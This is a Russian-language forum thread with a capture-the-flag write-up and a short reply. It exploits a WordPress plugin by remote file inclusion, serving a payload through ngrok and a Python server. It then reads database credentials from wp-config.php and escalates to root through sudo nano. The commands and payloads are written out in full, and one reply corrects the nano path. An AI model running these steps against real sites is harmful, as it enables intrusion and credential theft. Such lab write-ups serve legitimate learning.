![]() |
Ответы на вопросы
Будет ли видео на канале? - Нет, по 2 причинам: 1) Я могу запалить свой IP или другую информацию 2) квесты, условно говоря, являются "премиальными" тасками Но на твоём канале уже есть прохождение таска "Подземелье" -Тогда я ещё не знал что таски являются "премиальными", + вроде ничего не запалил серьёзного, поэтому и удалять не стал. Решение таска После попадания на сайт нам нужно заглянуть в код элемента. Там мы находим комментарий который нам намекает на уязвимый компонент. https://forum.antichat.xyz/attachmen...9701373007.png Я сначала обнаружил ссылки связаные с WordPress и начал искать изъяны в нём Находим информацию в интернете по запросу "Warfare v3.5.2 exploit" и находимgithub с эксплойтом. Теперь самое неприятное, это работа с ngrok. Запускаем на своей машине ngrok и Python сервер. Код:
ngrok http 8000Код:
python3 http.server 8000Код:
python2 script.py --target URL --payload-uri NGROK-LINK/payload.txtВ payload.txt пишем: Код:
system('id')В файлах конфигурации сервера, а именно в файле wp-config.php мы находим пароль от пользователя Kiddie. Код:
system('cat ../wp-config.php')Пишем команду Код:
sudo -lКак мы знаем (а кто не знает сейчас узнает), мы можем исполнять команды в nano. Создаём текстовый файл например "1.txt" и открываем следующим образом. Код:
sudo nano 1.txtКод:
ls /root/ |
Спасибо за райтап.
Только не sudo nano 1.txt, а sudo /usr/bin/nano /tmp/1.txt Так как sudo nano вызывает nano из /bin/nano, на что у нас нет прав |
Цитата:
Цитата:
|
| Время: 01:49 |